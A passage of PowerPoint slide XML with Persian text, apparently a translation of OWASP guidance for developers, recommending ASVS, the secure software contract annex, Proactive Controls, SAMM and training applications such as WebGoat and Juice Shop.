                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>توصیه می کند از استانداردهای تأیید امنیتی نرم افزار </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP (ASVS) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> به عنوان راهنمایی برای تنظیم الزامات امنیتی برای برنامه های خود استفاده کنید. اگر شما برون سپاری کنید، پیوست قرارداد نرم افزار امن </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>را در نظر بگیرید. نکته: این ضمیمه برای قانون قرارداد ایالات متحده است، بنابراین قبل از استفاده از ضمیمه نمونه، لطفا با مشاوره قانونی مشورت کنید.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">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12514" y="3989731"/>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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>به جای ارتقاء امنیت به برنامه ها و </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>های خود، از زمان شروع طراحی امنیت بسیار مؤثرتر است. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>را به عنوان نقطه شروع خوبی برای راهنمایی در مورد چگونگی طراحی امنیت از ابتدا توصیه می کند.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" baseline="0" dirty="0">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fa-IR"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معماری امنیتی برنامه کاربردی</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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>کنترل های امنیتی قوی و کاربردی دشوار است. با استفاده از مجموعه ای از کنترل های امنیتی استاندارد به طور قابل توجهی توسعه برنامه های امنیتی و </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>ها را ساده می کند. کنترل های پیشگیرانه </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> یک نقطه شروع خوب برای توسعه دهندگان است و بسیاری از چارچوب مدرن اکنون با کنترل های استاندارد و موثر امنیتی برای مجوز، اعتبار، پیشگیری از </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>و غیره ارائه می شود.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" baseline="0" dirty="0">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fa-IR"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کنترل های استاندارد امنیتی</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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>برای بهبود روند سازمان شما در هنگام ساخت برنامه ها و </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>ها، </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> توصیه می کند مدل بلوغ اطمینان نرم افزار </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP (SAMM) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> را ارائه دهد. این مدل به سازمانها کمک می کند تا یک راهبرد برای امنیت نرم افزار را طراحی و اجرا کنند که به خطرات خاص سازمان مربوط می شود.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" baseline="0" dirty="0">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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>پروژه آموزش </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>فراهم می کند آموزش های آموزشی برای کمک به توسعه دهندگان در امنیت برنامه های وب. برای یادگیری در مورد آسیب پذیری ها، </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>، WebGoat.NET، OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>NodeJS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> Goat، OWASP Juice Shop Project </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>یا </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>برنامه های کاربردی وب سایت شکسته شده را امتحان کنید. برای اقامت فعلی، به یک کنفرانس </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>AppSec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>، </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>آموزش کنفرانس </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP، </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>یا جلسات فصل </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>محلی بروید.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:endParaRP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fa-IR"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آموزش امنیت برنامه‌ کاربردی</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11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
